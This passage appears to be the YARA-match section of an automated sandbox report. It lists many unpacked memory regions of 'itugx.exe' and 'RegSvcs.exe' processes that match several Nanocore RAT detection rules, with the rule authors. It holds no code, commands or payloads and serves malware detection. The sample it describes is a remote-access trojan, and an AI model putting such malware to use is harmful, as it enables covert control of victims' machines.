      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31c9674.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.41b560b.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.146edb8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b0000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.141ed90.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 19.2.RegSvcs.exe.d00000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.19b7de8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31c9674.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 21.3.itugx.exe.13b5d80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41b07ce.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41bb041.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b4dd8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b9c38.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.1530ec0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b4629.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.60b0000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.31ce6d4.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 3.2.RegSvcs.exe.37b4dd8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.15c6de8.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.1a20df8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 28.3.itugx.exe.1405da8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 5.3.itugx.exe.162fdf8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.deecc0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 25.3.itugx.exe.19b7de8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
      Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
